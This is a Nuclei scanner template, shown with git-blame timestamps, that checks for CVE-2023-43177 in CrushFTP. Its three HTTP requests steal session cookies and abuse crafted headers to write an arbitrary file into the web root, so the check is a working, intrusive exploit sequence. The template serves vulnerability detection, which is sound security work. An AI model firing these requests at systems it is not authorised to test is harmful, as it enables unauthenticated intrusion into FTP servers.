2023-12-12 09:13:40 +00:00
|
|
|
id: CVE-2023-43177
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
|
|
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
|
|
|
|
reference:
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-43177
|
|
|
|
- https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
|
|
|
|
- https://blog.projectdiscovery.io/crushftp-rce/
|
2023-12-12 11:07:52 +00:00
|
|
|
- https://github.com/the-emmons/CVE-Disclosures/blob/main/Pending/CrushFTP-2023-1.md
|
2024-03-23 09:28:19 +00:00
|
|
|
- https://github.com/nomi-sec/PoC-in-GitHub
|
2023-12-12 09:13:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2023-43177
|
|
|
|
cwe-id: CWE-913
|
2024-03-23 09:28:19 +00:00
|
|
|
epss-score: 0.92767
|
2024-04-08 11:34:33 +00:00
|
|
|
epss-percentile: 0.98966
|
2023-12-12 09:13:40 +00:00
|
|
|
cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
|
|
|
|
metadata:
|
|
|
|
max-request: 3
|
|
|
|
vendor: crushftp
|
|
|
|
product: crushftp
|
2023-12-13 17:11:14 +00:00
|
|
|
tags: cve,cve2023,crushftp,unauth,rce,intrusive
|
2023-12-12 09:13:40 +00:00
|
|
|
flow: http(1) && http(2) && http(3)
|
|
|
|
|
|
|
|
variables:
|
|
|
|
dirname: "{{randbase(5)}}"
|
|
|
|
filename: "{{randbase(5)}}"
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/WebInterface"
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
2024-01-10 14:07:36 +00:00
|
|
|
internal: true
|
2023-12-12 09:13:40 +00:00
|
|
|
dsl:
|
|
|
|
- contains_all(to_lower(header), "currentauth", "crushauth")
|
|
|
|
|
|
|
|
- method: POST
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
|
|
|
|
|
|
|
|
headers:
|
|
|
|
Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
|
|
|
|
as2-to: X
|
|
|
|
user_name: crushadmin{{dirname}}
|
|
|
|
user_log_path: "./WebInterface/{{dirname}}/"
|
|
|
|
user_log_file: "{{filename}}"
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
body: |
|
|
|
|
post=body
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "crushadmin"
|
|
|
|
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- status_code == 200
|
|
|
|
- contains(body, "crushadmin{{dirname}}")
|
2023-12-12 12:02:03 +00:00
|
|
|
condition: and
|
2024-03-25 11:57:16 +00:00
|
|
|
# digest: 4a0a00473045022100830445e9bba00a117daddfca1259b9ef7a022d6fe27e13f9cb7b40949407bd9c02204a02f01f53e956fcc4b5e30944fd8a5bc1bb49d9f20ff4fb78329f46f5adf916:922c64590222798bb761d5b6d8e72950
|